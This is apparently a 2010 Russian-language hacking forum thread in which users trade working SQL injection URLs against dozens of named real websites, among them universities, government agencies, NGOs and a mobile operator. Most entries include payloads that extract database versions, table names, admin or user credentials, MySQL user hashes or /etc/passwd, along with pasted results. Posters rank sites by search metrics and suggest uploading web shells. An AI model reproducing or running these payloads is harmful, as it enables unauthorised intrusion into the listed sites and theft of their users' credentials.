http://www.btsati.org/Ancien/fiche_entreprise.php?entreprise=-83+union+select+concat_ws(0x3a3a,login,pwd),2,3,4, 5,6,7,8,9,10,11,12,13,14,15+from+admin+--+
koelner-gastronacht.de пр2
http://www.koelner-gastronacht.de/liste.php?id=-5+union+select+1+--+
francknet.net
http://www.francknet.net/details.php?recnum=-1069'+union+select+1,2,3,4,5,group_concat(table_na me)+from+information_schema.tables+--+&num_cd=99
jardin-aromes.com пр2
http://www.jardin-aromes.com/actu.php?id_art=-26+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+
snoci-charpente-vendee.fr пр2
http://www.snoci-charpente-vendee.fr/actu/index.php?id_art=-12+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+f rom+information_schema.tables+--+
cancheauthietourisme.com пр3
http://cancheauthietourisme.com/liste.php?categorie=-1+union+select+1,2,3+from+information_schema.table s+--+
deutz-teilemarkt.de пр1
http://www.deutz-teilemarkt.de/liste.php?art=angebot&kat=2&unterkat=-9+union+select+1,2,3,4,id,6,7,8,9,10,11,12,13,14,1 5,16,17,18+from+user+--+
triathlon-service.de пр3
http://www.triathlon-service.de/ergebnisse/liste.php?nr=-2361+union+select+1,2,3,4,concat_Ws(0x3a3a,nr,emai l,name,pw),6+from+user+--+
si.loin.si.proche.free.fr пр1
http://si.loin.si.proche.free.fr/journal.php?gstrLangue=fr&IdSkin=_2010&id_modal=2+union+select+1,2,user(),4,5,6,7,8,9,10, 11,12,13,14,15+--+
batali.fr
http://batali.fr/journal.php?num=-9+union+select+1,2,3,4,5,6,7,8+--+
sainte-menehould.fr пр4
http://www.sainte-menehould.fr/demo.php?frame_c=-48'+union+select+concat_ws(0x3a3a,g_id,g_userName, g_fullName,g_hashedPassword,g_email)+from+g2_User+ limit+1,1+--+&parent=2
fin-audit.ru пр3 тиц40
http://www.fin-audit.ru/pub.php?id=-9'+union+select+1,2,3,4,5,6+--+&limit=0'
apb.thecomplex.com
http://apb.thecomplex.com/view_group.php?id=-9+union+select+1,2,3,4,5,6,7,8+union+select+1,2,3, 4,5,6,7,8+--+
cyrillignac.com пр3
http://www.cyrillignac.com/cuisine/recettes_detail.php?id=-11+union+select+1,table_name,3,4,5,6,7,8,9+from+in formation_schema.tables+--+
academiatribus.com
http://www.academiatribus.com/popfoto.php?CodFoto=-111+union+select+user(),2+--+
cafepuertorico.com пр3
http://www.cafepuertorico.com/popfoto.php?id=17+union+select+1,2,3,group_concat( table_name)+from+information_schema.tables+--+&eleccion=1
easynudes.com AlexRang 76753
http://www.easynudes.com/videos/player2.php?id=-41179+union+select+1,concat_ws(0x3a3a,id,username, password),3,4,5,6+from+tps_users+--+&from=c
ТЕАТР.DOC
http://www.teatrdoc.ru/plays.php?id=-42+union+select+1,2,concat_ws(char(58),@@version,u ser(),database(),@@version_compile_os),4,5+--
version : 5.1.41-log
user : kinoteatr_mysql@194.85.92.114
database : kinoteatr_td
os : portbld-freebsd7.2
http://www.teatrdoc.ru/plays.php?id=-42+union+select+1,2,group_concat(login,0x3a,passwo rd+SEPARATOR+0x0b),4,5+from+kt_users--
обзор международных социальных вопросов
www.risq.org
http://www.risq.org/modules.php?name=News&file=print&sid=-367+union+select+1,2,3,4,5,6,7
version() : 5.0.51a-24+lenny4
OS : debian-linux-gnu
PR-5
mq=off
http://cfp.ist.utl.pt/golp/People/pass.php?id=-1+union+select+1,concat_ws(version(),database(),us er(),@@version_compile_os),3,4--
db_golp_server
4.0.24
www@cfp.ist.utl.pt
apple-darwin 7.0 1
http://www.positivenet.ru/page.php?pg=9+and+1=0+union+select+concat(version( ),0x3a,user(),0x3a,database()),2,3,4,5,6,7,8,9,10--
version: 5.0.90-log
user: u55780@10.8.0.24
database: u55780
http://www.mr-logistic.ru/index.php?pg=-4+union+select+1,2,3,4,5,6,7,8,9,concat(version(), 0x3a,user(),0x3a,database())--
version: 5.0.77-log
user: mrlogis1_1@localhost
database: mrlogis1_1
http://www.horrorworld.ru/read.php?pg=3&id_author_text=-725+union+select+1,concat(version(),0x3a,user(),0x 3a,database()),3,4,5,6,7,8,9,10,11,12,13--
version: 4.1.25-log
user: horrorw0_mor@localhost
database: horrorw0_virtgurn
http://travelonline.ru/act.php?pg=shop_razdel&cat=1767+and+1=0+UNION+SELECT+unhex(hex(version()) )--
version: 5.0.67-log
user: travelonlineru
database: travelonlineru@10.10.10.211
http://www.pdphoto.org/PictureDetail.php?mat=&pg=-5237+union+select+1,2,3,4,5,concat(version(),0x3a, user(),0x3a,database()),7,8,9,10,11,12,13,14,15--
version: 4.0.27-standard
user: dbo117553747@localhost
database: db117553747
http://www.petropanel.ru/page.php?pg=12+and+1=0+union+select+concat(version (),0x3a,user(),0x3a,database())--
version: 4.1.25-log
user: 00092144@localhost
database: db00092144
http://www.via-sport.ru/index.php?pg=-56+union+select+1,2,3,4,5,6,7,8,9,concat(version() ,0x3a,user(),0x3a,database())--
version: 5.0.37-standard
user: viasport_1@localhost
database: viasport_1
http://www.c2clive.com/latestexamcalender.php?id=202+and+1=0+union+select +1,concat(version(),0x3a,user(),0x3a,database()),3 ,4,5,6,7,8,9--
version: 5.0.91-log
user: c2clive@72.167.232.225
database: c2clive
http://www.phas.ru/products.php?id=-19+union+select+1,2,3,4,concat(version(),0x3a,user (),0x3a,database())--
version: 4.1.22-standard-log
user: phasru_ayrat@localhost
database: phasru_products
http://germanfirms.ru/products.php?id=-63+union+select+concat(version(),0x3a,user(),0x3a, database())--
version: 4.1.22-log
user: db156426_4@local2
database: db156426_4
http://isvet.ru/products.php?id=15+and+1=0+union+select+1,2,3,4,5, 6,7,8,9,10,concat(version(),0x3a,user(),0x3a,datab ase())--
version: 5.0.51a-24+lenny3-log
user: z34890_isvet@77.221.130.12
database: z34890_isvet
http://ural-m.perm.ru/products.php?id=8+and+1=0+union+select+1,concat(ve rsion(),0x3a,user(),0x3a,database()),3,4,5--
version: 5.0.45-log
user: ural@localhost
database: ural
http://mmpris.ru/products.php?rid=2&id=-5+union+select+1,concat(version(),0x3a,user(),0x3a ,database()),3--&page=3
version: 4.1.21-community-max-nt-log
user: 1gb_mmpris@10.0.1.32
database: 1gb_mmpris
http://www.cbwgaming.com/index.php?pg=games&action=view&id=-37+union+select+1,2,3,concat(version(),0x3a,user() ,0x3a,database()),5,6,7,8,9,10,11,12--
version: 5.0.90-community-log
user: cbwtest_newuser@localhost
database: cbwtest_cbwvideo
http://www.wwf.org.ph/newsfacts.php?pg=det&id=-110+union+select+concat(version(),0x3a,user(),0x3a ,database())--
version: 5.1.47
user: wwforgph_wwfdbu@localhost
database: wwforgph_wwf
http://www.mybajaguide.com/eng/detail-news.php?news=-125+union+select+1,2,3,4,concat(version(),0x3a,use r(),0x3a,database()),6,7,8,9,10,11,12,13--
version: 4.1.25-Debian_mt1-log
user: db9596_master@64.13.192.44
database: db9596_my
http://www.santeh-stil.ru/archive_news.php?id=-48+union+select+concat_ws(0x3a,@@version,user(),da tabase(),@@version_compile_os),2+--
version : 5.0.90-community
user : santehst_santeh@localhost
database : santehst_santehst
os : pc-linux-gnu
http://www.santeh-stil.ru/archive_news.php?id=-48+union+select+concat_ws(0x3a,log,pas,email,fio), 2+from+customer--
Code:
http://mir.k156.ru/catviefot3.php?foto_id=-21+union+select+1,2,3,4,concat_ws(0x3a,@@version,u ser(),database(),@@version_compile_os),6,7+--
version : 5.0.32-Debian_7etch12-log
user : kostroma_cosf@77.221.130.2
database : kostroma_cosf
os : pc-linux-gnu
http://www.nigfilmcorp.com/content.php?id=39+union+select+1,2,concat_ws(0x3a, user(),version(),database(),@@version_compile_os), 4,5
PR-5
-PRIVAT-
18.06.2010, 15:39
PR- 3
version() : 5.0.90-community
http://www.biochemistry-imm.org/article.php?sid=-13+union+select+1,2,concat(username,0x3a,password) ,4,5,6,7+from+phpauthent_users
user() : biochemi_site@localhost
ОС : pc-linux-gnu
http://www.singaporeartmuseum.sg/exhibitions/details.php?id=-48+/*!UnIoN+SeLeCt*/+1,2,concat_ws(0x3a,version(),user(),database(),@@ version_compile_os),4,5,6,7,8,9,10,11,12,13
PR-5
----------------
http://www.diagnosisp.com/dp/journals/journal.php?journal_id=-1'+or(1,1)=(select+count(0),concat((select+concat( email_address,char(58),password)+from+dp_users+lim it+0,1),floor(rand(0)*2))from(information_schema.t ables)group+by+2)--+
PR-5
---------------
http://www.law.cf.ac.uk/research/themes/theme.php?id=-8+or(1,1)=(select+count(0),concat((select+concat_w s(0x3a,user(),version(),database(),@@version_compi le_os)+from+information_schema.tables+limit+0,1),f loor(rand(0)*2))from(information_schema.tables)gro up+by+2)--+
PR-6
-------------
http://www.restaurant.bg/en/search_results_en.php?city_id=-224+or(1,1)=(select+count(0),concat((select+concat _ws(0x3a,user(),version(),database(),@@version_com pile_os)+from+information_schema.tables+limit+0,1) ,floor(rand(0)*2))from(information_schema.tables)g roup+by+2)--+
PR-4
PR 5
Code:
http://jobs.nation.co.ke/details.php?id=-2044+union+select+1,2,3,4,5,6,7,8,9,10,11,12,conca t%28Username,0x3a,Password%29,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29+from+users%20--
version : 5.0.45
user : job@localhost
database: job
life_glider
19.06.2010, 06:27
http://www.jrm-group.com/view_news.php?news_id=-1%20union%20select%201,2,concat_ws%280x3c62723e,ve rsion%28%29,database%28%29,group_concat%28table_na me,0x3c62723e%29%29,4,5,6,7%20from%20information_s chema.tables%20where%20table_rows--
Code:
PR 3
5.0.77
admin5466@localhost
jrm-group_com_jrm
brands
,categories
,customers
,news
,news_images
,order_items
,orders
,pages
,product_options
,products
http://www.facorsteel.com/news.php?news_id=-1%20union%20select%201,concat_ws%280x3a,version%28 %29,user%28%29%29,3,4,5,6,7,8
-PRIVAT-
19.06.2010, 09:18
PR 5
ТИЦ 10
http://www.thewitness.org/printArticle.php?id=186-999.9+union+select+1,2,3,4,5,6,7,8,9,10,group_conc at%28table_name%29,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47,48,49,50,51,52,53+from+ INFORMATION_SCHEMA.TABLES--
version() - 5.0.45
user() - thewitne_admin@localhost
database() - thewitne_db
@@version_compile_os - unknown-linux-gnu
Дальше как-то сами...
http://www.igorapark.ru/php/gzstat.php?id=23&categoria=-1'+union+select+version()+--+
version: 5.0.56-lk-log
http://www.downloadhq.org/search.php?q=Fantasy',(select%20count(*)%20from%20 (select%201%20union%20select%202%20union%20select% 203)x%20group%20by%20concat(version(),floor(rand(0 )*2))))%23
Version:5.0.77
CyberHunter
19.06.2010, 16:35
Code:
http://www.artcom.de/index.php?lang=en&option=com_acprojects&id=24+and+substring%28version%28%29,1,1%29=4+--+&Itemid=144&page=6
Blind, 4-ая ветка.
http://www.downtowngr.org/biz.php?maincategory_id=4+and+substring(version(), 1,1)=5--
PR-4
----
http://www.brusa.biz/news/news.php?l_sel=2&idm=4&idk=-9+or(1,1)=(select+count(0),concat((select+concat_w s(0x3a,user(),version(),database(),@@version_compi le_os)+from+information_schema.tables+limit+0,1),f loor(rand(0)*2))from(information_schema.tables)gro up+by+2)--+
PR-4
Sql Вм- обменика с полями в угадайку нужно будет поиграть.
Code:
http://wm-change.com
/?buy&id=57%20and%201=2%20unIon%20seLect%20111,222,333,4 44,555,666,777/
http://www.proteinkinase.biz/page.php?modul=GoShopping&op=show_article&aid=912&cid=-74'+or(1,1)=(select+count(0),concat((select+versio n()+from+information_schema.tables+limit+0,1),floo r(rand(0)*2))from(information_schema.tables)group+ by+2)--+
PR-4
-----
http://www.mmpbooks.biz/mmp/photo_reps.php?photo_rep_id=-17+union+select+1,group_concat(user_name,char(58), password),3,4,5+from+cms_users
PR-3
------
http://www.acube-systems.biz/index.php?page=news&id=-68+union+select+1,2,3,concat_ws(0x3a,user(),versio n(),database(),@@version_compile_os),5
PR-5
CyberHunter
19.06.2010, 21:59
Code:
http://psiyoga.ru/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,1,2,3,4+--+
User: gb_x_psiyoga@81.176.226.182
Version: 5.0.70-log
Database: gb_x_psiyoga
http://skazki.org.ru/view.php?id=-7468+union+select+1,concat_ws(char(58),user(),vers ion(),database(),@@version_compile_os),3,4,5,6
PR-4
тИЦ-120
/*мой первый сайт из Рунета*/
Code:
http://collegian.kenyon.edu/issue.php?issue_no=-1'+union+select+1,2,user(),4--+
user:webcoll@rhea.kenyon.edu
version:5.0.77
pr:5
http://ipsnorthamerica.net/news.php?idnews=2694+and+1=0+union+select+1,2,3,4, concat_ws(char(32,58,32),user(),version(),database (),@@version_compile_os),6,7,8,9,10,11,12,13,14,15
PR-6
CyberHunter
21.06.2010, 00:50
Code:
http://swc.com.ua/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,12,3,4+--+
Version: 4.1.22-standard-log
Database: student_SWC
User: student_user@localhost
PR - 1
ТИЦ - 10
Вот юзеры:
Code:
http://swc.com.ua/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,concat%28username,0x 3a,password%29,2,3,4+from+jos_users--
Только в админку доступа нет, идет редирект на морду.
Code:
http://www.crie.min-edu.pt/index.php?section=162-999.9+union+select+1,2,3,4,5,6,7,8,concat_ws(user( ),version(),database()),10,11,12,13,14--
PR 7
вывод сверху
version - 4.1.22
user - mde@localhost
database - mde
Code:
http://www.hbtheusden.nl/Content/base.php?ID=10-999.9+union+select+1,2,concat_ws(user(),version(), database()),4,5,6,7,8,9,10,11,12,13,14,15--
PR 4
вывод тоже сверху
version - 5.0.67
user - hbvt_hbvt@localhost
database - hbvt_Hbt
P.S. Мой первый скуль в паблике и надеюсь не байанный и не последний...
PR 5
Code:
http://www.readingmatters.co.uk/book2.php?id=-235+union+select+1,concat_ws%280x3a,version%28%29, database%20%28%29,user%28%29%29,3,4,5,6,7,8,9%20--
version : 5.0.67-community-log
database : readingmatters
user: davidmarshall@localhost
pechory.library.ru
PR - 8
ТиЦ - 5400
MySQL 4.1.20
LOAD FILE:
Code:
http://pechory.library.ru/cls/smi/article.php?id=12+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10+from+mysql.user+--
с ковычками проблем нет)
---------------------------------------------------------
Sql Inj XSS:
Code:
http://pechory.library.ru/cls/smi/article.php?id=12+union+select+1,2,3,4,5,'alert(); ',7,8,9,10+from+mysql.user+--
---------------------------------------------------------
all:
Code:
http://pechory.library.ru/cls/smi/article.php?id=12+union+select+1,2,3,4,5,6,group_c oncat(0x0b,user,0x3a,password,0x3a,host,0x3a,file_ priv),8,9,concat_ws(0x3a,@@version_compile_os,0x3a ,user(),0x3a,version(),0x3a,database())+from+mysql .user+--
Вам осталось только раскрыть пути и залить шелл=)
http://www.adaderana.lk/show.php?prid=-4+UNION+SELECT+concat_ws(user(),version(),database ())--
вывод в названии картинки
PR4
http://www.anca.org/press_releases/press_releases.php?prid=-999.9+UNION+SELECT+1,concat_ws(user(),version(),da tabase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16--
тиц 50 pr 6
http://www.mordauntshort.com/press_releases.php?PRID=7
7 AND %тут выражение%
Current DB: mordauntshort2007
Tables: ms_admin
id: 1
username: ChrisSoutham
password:
ТИЦ70(R3) PR4
Сборочка
accordsalud.com.ar pr 3
Code:
http://www.accordsalud.com.ar/php/turismo/destinos/alojamientos.php?id=34-999.9+union+select+1,2,concat_ws(user(),version(), database()),4,5,6,7,8,9,10,11,12,13,14,15,16--
version - 5.1.3.8-community
user - up@localhost
database - accord_salud
vvaltena.nl тиц 10 pr 2
Code:
http://www.vvaltena.nl/default.php?id=47-999.9+union+select+1,concat_ws(user(),version(),da tabase()),3--
version - 5.1.47
user - vvaltena@net3-nl-iis-94.ad.vevida.net
database - vvaltena
newmexicocreates.org pr 5
Code:
http://newmexicocreates.org/artists.php?id=1146-999.9+union+select+1,2,3,concat_ws(user(),version( ),database()),5,6,7,8,9,10,11,12,13,14,15,16,17--
version - 4.1.22
user - mnmadmin@que.newmex.com
database - mnmfdb
pustin2000.ru pr 2
Code:
http://www.pustin2000.ru/material.php?id=7-999.9+union+select+1,concat_ws(user(),version(),da tabase()),3,4,5,6,7,8,9--
version - 4.1.25
user - pustin20@localhost
database - wwwpustin2000ru
polymery.ru тиц 60 pr 4
Code:
http://www.polymery.ru/material.php?id=3-999.9+union+select+1,concat_ws(user(),version(),da tabase()),3--
version - 5.0.88
user - u44790@10.8.2.20
database - u44790
worldmusicinstitute.org тиц 10 pr 4
Code:
http://www.worldmusicinstitute.org/event.php?id=906-999.9+union+select+1,2,3,4,5,6,7,8,concat_ws(user( ),version(),database()),10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51, 52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68 ,69,70,71,72,73,74--
version - 4.1.25-Debian_mt1-log
user - worldmusicinst@64.13.192.29
database - worldmusicinstitute_org_-_ucms
klimt02.net pr 5
Code:
http://www.klimt02.net/jewellers/index.php?item_id=11203-999.9+union+select+1,2,3,4,5,6,concat_ws(user(),ve rsion(),database()),8--
version - 5.0.67-community
user - klimt03_01@localhost
database - klimt03_01
thermos-russia.ru 20 тиц , pr 2
Code:
http://www.thermos-russia.ru/showimg.php?id=68-999.9+union+select+1,2,3,4,5,6,7,concat_ws(user(), version(),database()),9,10,11,12--
version - 4.0.26
user - thermo@aqua.di-net.ru
database - thermo
futureevents.ru тиц 20
Code:
http://www.futureevents.ru/event.php?id=86-999.9+union+select+1,concat_ws(user(),version(),da tabase()),3,4,5,6,7--
version - 5.0.45-community
user - ntsison@localhost
database - sison
cosplay.compgamer.com pr 3
Code:
http://cosplay.compgamer.com/readnews.php?id=4848-999.9+union+select+1,concat_ws(user(),version(),da tabase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39,40,41,42,43,44,45,46--
version - 5.0.45-log
user - compgamer_com@localhost
database - compgamer_com_2
P.S. Всё тщательно проверял на бойанность,но если где-то пропустил,извиняйте!
http://www.wordsfromreuben.com/2009/songs.php?rid=17+union+select+1,2,concat_ws(0x3a,u ser(),version(),database(),@@version_compile_os),4 ,5,6,7
PR-4
РЕЧФЛОТ
http://www.rechflot.ru/page/static.php?pn=-21+and+1=2+union+select+1,2,concat_ws(0x3a,version (),user(),database(),@@version_compile_os),4+--
version : 5.0.67-log
user : h2rechf_mainuser@www5.100mb.ru
database : :h2rechf_rechflot
os : portbld-freebsd6.2
таблица users
/admin/...
http://hodi.org.zm/index.php?sid=1925+and+substring(version(),1,1)=4
Code:
http://www.agribid.de/faq.pl?cat=16-999.9+union+select+1,concat_ws(user(),version(),da tabase())--
PR 4
version - 5.0.67
user - agribidde@localhost
database - agribid
http://info.web.lehigh.edu/EI/story.php?id=-5+union+select+1,2,3,4,5,6,group_concat(0x0b,user_ name,0x3a,password),8+from+users--
PR4
http://www.woolstoneyes.co.uk/newsletter-story.php?id=-5+union+select+1,group_concat(0x0b,username,0x3a,p assword),3,4,5+from+users--
PR6
http://www.sussex.edu/news/story.php?id=-5+union+select+1,2,group_concat(0x0b,table_name)+f rom+information_schema.tables--
PR4
http://www.freechineselessons.com/story.php?id=-5+union+select+1,2,3,group_concat(0x0b,table_name) ,5+from+information_schema.tables--
PR4
http://www.rivervalleystampclub.org/story.php?id=-5+union+select+1,2,group_concat(0x0b,table_name),4 ,5,6,7+from+information_schema.tables--
BlackFan
22.06.2010, 14:26
МегаФон.ru
Code:
http://volga.zamenigoodok.megafon.ru/modal/rbt_properties/rbtId/38878/rbtCode/-1+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5,6,7,8+--+
user - root@10.97.0.35
database - mgf
version - 5.1.42
А так же на многих остальных, где есть "Замени Гудок", посмотреть можно тут
Code:
http://www.megafon.ru/f/ru/gudok/index.html
http://www.fmnplc.com/news_details.php?recordID=-2046+union+select+1,aes_decrypt(aes_encrypt(group_ concat(user,char(58),password),1),1),3,4+from+mysq l.user--
http://www.fmnplc.com/myadmin/
http://www.fmnplc.com/news_details.php?recordID=-2046+union+select+1,aes_decrypt(aes_encrypt(concat _ws(0x3a,username,password),1),1),3,4+from+users--
http://www.fmnplc.com/cms/
DezMond™
22.06.2010, 15:20
boulogne-developpement.com пр5
Code:
http://www.boulogne-developpement.com/parcs2.php?id=49+unIOn+sELEct+1,2,3,4,5,6,7,8,9,10 ,11,12+--+
odno.nat.tn пр3
Code:
http://www.odno.nat.tn/fr/index.php?id=-9+union+select+1,2,3,4,5,6,7+--+
intermobili.com
Code:
http://www.intermobili.com/ita/popfoto.php?inmod=acan&inseq=-40+union+select+version(),2,3,4,5+--+
topalberghi.com пр2
Code:
http://www.topalberghi.com/popfoto.php?id=-4+uNIon+sELEct+1,2,concat_ws(0x3a3a,id,email,pwd), 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+ad min+--+&num=1
tourisme-montreuillois.com пр5
Code:
http://www.tourisme-montreuillois.com/loger_details.php?id=-6+uNIon+sELEct+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22+--+&type=2&classement=2
e-bcsystems.com
Code:
http://www.e-bcsystems.com/docDown.php?id=-13+union+select+1,2,concat_ws(0x3a3a,email,passwor d),4,5,6,7,8,9,10,11+from+users+--+
pilotimmobilier.com пр3
Code:
http://www.pilotimmobilier.com/site/_Conseil_immobilier_/General.php?rech=2&rub=-5+UniOn+SEleCt+unhex(hex(user()))+--+
vsvgroup.ru пр3 тиц 30
Code:
http://www.vsvgroup.ru/catalog.php?type=-15+union+select+1,2,3,4,concat_ws(0x3a3a,login,pas s),6,7+from+users+--+&maintext=true
privcams.com пр4 AlexRank 263929
Code:
http://www.privcams.com/film.php?Lp=99999'+union+select+1,group_concat(tab le_name),3,4,5,6,7,8,9,10+from+information_schema. tables+group+by+table_schema+limit+1,1+--+
e-sexspiele.com пр3
Code:
http://www.e-sexspiele.com/Vip/Erotikspiele_3D.php?Lp=-7'+union+select+1,group_concat(table_name),3,4,5,6 ,7,8,9,10,11+from+information_schema.tables+group+ by+'+union+select+1,2,3,4,5,6+--+
babeblvd.com пр3 Alex Rank 343490
Code:
http://www.babeblvd.com/videos/player.php?id=89&v=54'+union+select+1,2,3,4,5,6+--+
bobbystube.com пр2 Alex Rank 12377
Code:
http://www.bobbystube.com/videos/player.php?id=-21226+union+select+1,concat_ws(0x3a3a,id,username, password),3,4,5,6+from+tps_users+--+&from=c
wooltube.com пр2 Alex Rank 96986
Code:
http://www.wooltube.com/videos/player.php?id=-23230+union+select+1,group_concat(table_name),3,4, 5,6+from+information_schema.tables+--+&from=c
iclipart.com пр6 Alex Rank 21004
Code:
http://www.iclipart.com/download.php?iid=-197506'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,table_name,42,43,4 4,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60, 61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77 ,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,9 4,95,96,97,98,99,100,101,102,103,104,105,106,107,1 08,109,110,111,112,113,114+from+information_schema .tables+--+&submit=&keys=spring¬keys=&start=0&andor=AND&c1=&c2=&s1=&s2=&release1=&release2=&previewcheck=&cat=All&type=&rows=5&jump=0&period=&collection=&group=&tl=photos&adv=
brushcountrymonsters.com
Code:
http://www.brushcountrymonsters.com/videos/player.php?id=-5'+uNIoN+sELeCT+1,2,3,group_concat(table_name),5,6 ,7,8,9,10,11,12,13,14,15,16+from+infOrmAtion_schEm A.tAblEs+group+by+table_Schema+limit+1,1+--+
parissud130.org
Code:
http://www.parissud130.org/videos/desc_videos.php?vid=-435+union+select+1,2,3,4+--+
hunt8.com Alex Rank 2322
Code:
http://www.hunt8.com/videos/player.php?id=-186779+union+select+1,concat_ws(0x3a3a,id,username ,password),3,4,5,6+from+tps_users+--+&from=a
fulltubemovies.com Alex Rank 1494
Code:
http://fulltubemovies.com/videos/player.php?id=-186779+union+select+1,table_name,3,4,5,6+from+info rmation_schema.tables+limit+160,300+--+&from=a
Сборочка №2 by ~d0s~
laemmle.com pr 6 тиц 10
Code:
http://www.laemmle.com/viewmovie.php?mid=5116-999.9+union+select+1,2,3,4,5,6,concat_ws(user(),ve rsion(),database()),8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39,40,41,42,43,44,45,46--
notamusica.com pr 2
Code:
http://www.notamusica.com/index.php?id=11-999.9+union+select+1,2,3,4,5,6,7,concat_ws(version (),user(),database()),9,10--
tandem-org.de pr 6 тиц 10
Code:
http://www.tandem-org.de/start.php?seite_id=202-999.9+union+select+1,concat_ws(user(),version(),da tabase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16--
cafejos.org pr 1
Code:
http://www.cafejos.org/profileview.php?pr=28-999.9+union+select+1,concat_ws(user(),version(),da tabase()),3,4,5,6,7--
teamcompany.com pr 3
Code:
http://www.teamcompany.com/eng/imglb.php?img=27-999.9+union+select+1,2,3,4,5,6,7,8,9,concat_ws(use r(),version(),database()),11--
roughtrax4x4.com pr 2
Code:
http://www.roughtrax4x4.com/index.php?doc=87-999.9+union+select+1,2,concat_ws(user(),version(), database()),4,5,6,7,8,9,10,11--
nepaltrekplan.com pr 1
Code:
http://www.nepaltrekplan.com/page.php?q=3-999.9+union+select+1,concat_ws(user(),version(),da tabase()),3,4,5,6,7,8,9--
difchihuahua.gob.mx pr 1
Code:
http://www.difchihuahua.gob.mx/nota.php?sec=5%26id=25-999.9+union+select+1,2,concat_ws(user(),version(), database()),4,5--
losinformantes.com.mx pr 1
Code:
http://www.losinformantes.com.mx/Nota.php?sec=186-999.9+union+select+1,2,concat_ws(user(),version(), database()),4,5--
reachdevelopment.com тиц 10 pr 3
Code:
http://reachdevelopment.com/about/press/article.php?pr=150-999.9+union+select+1,2,3,concat_ws(user(),version( ),database()),5,6,7--
indarsun.com pr 3
Code:
http://www.indarsun.com/_bin/ficha_noticia.php?mid=43-999.9+union+select+1,2,concat_ws(user(%20%20),vers ion(),database()),4,5,6--
P.S. Нигде ничего извлеч не пытался,выкладывал для вас,так что все в ваших руках.
P.S.S. Вывод не всегда на видном месте,где-то в титле,где-то в исходном коде,смотрим внимательно!
P.S.S.S Ждем сборочку №3 cегодня вечером или завтра днем!
Code:
http://www.tutpricol.ru/message.php?id=-115+union+select+1,concat_ws%280x3a,version%28%29, database%20%28%29,user%28%29%29,3,4,5,6,7%20--
version : 4.1.25-log
database : tutpric5_tutpricol
user : tutpric5_root@localhost
Code:
http://zoo.kurgan.ru/informs.php?id=-99+union+select+1,table_name,3,4,5,6,7,8,9+from+in formation_schema.tables --
version : 5.0.70
user : spivak3@localhost
database : spivak3
Code:
http://www.petazon.com/showcompany.php?id=-11177+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 ,48,49,50,51,52,TABLE_NAME,54,55,56,57,58,59,60,61 ,62+from+INFORMATION_SCHEMA.TABLES+limit+0,1%20--
version : 5.0.89-community-log
user : petazon_pet@localhost
database : petazon_pet
Министерство транспорта Уганды
http://www.works.go.ug/news_details.php?id=-5+union+select+group_concat(0x0b,table_name),2+fro m+information_schema.tables--
PR5
http://www.glassbox.tv/news/news_details.php?id=-5+union+select+1,group_concat(0x0b,table_name),3,4 +from+information_schema.tables--
http://www.abmsoft.de/news_details.php?id=-5+union+select+1,2,3,group_concat(0x0b,username,0x 3a,pw,0x3a,id),5+from+abm_login--
http://www.rn-inform.ru/index.php?id=7+union+select+concat_ws(0x3a,version (),database(),user(),@@version_compile_os)+limit+1 ,1
Database Version: 5.0.45
Database name: roilsoft
User name: roilsoft@localhost
Os:suse-linux
Code:
http://www.jofama.com/fashion/archived_folder.php?id=5-999.9+union+select+concat_ws(0x3a,user(),version() ,database(),@@version_compile_os),2,3,4,5,6,7--
PR 4
вывод в исходном коде
version - 5.0.45-log
user - jofama_se@j1499@s113.loopia.se
database - jofama_se
os - freebsd6.2
uri.edu
http://www.crc.uri.edu/index.php?themeid=-3+union+select+1,2,group_concat(user,char(58),pass word),4,5,6,7,8+from+mysql.user
user() : root@winooski.crc.uri.edu
version() : 4.1.22
OS : http://img1.pwhite.net/wp-includes/images/red-hat-logo-45.png
PR-7
тИЦ-230
PMA (https://les.mis.uri.edu/phpMyAdmin/)
http://www.tehimpex.kiev.ua/articleview.php?id=-87+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user(),@@version_compile_os),6,7,8,9,10
Database Version: 5.0.45-log
Database name: tehimpex_db
User name: tehimpex_root@localhost
Os: freebsd 6.2
Code:
http://www.music-co.com.ar/nota-novedades.php?n=68-999.9+union+select+1,2,concat_ws(0x3a,version(),us er(),database(),@@version_compile_os),4,5,6,7,8,9--
PR 3
version - 5.0.67-community
user - music_music@localhost
database - music_music
os - linux-gnu
http://baltasi.ru/text.php?id=-5+union+select+1,2,3,4,group_concat(0x0b,pass,0x3a 3a,name),6+from+2z__users--
Университет нефти и газа им.Губкина
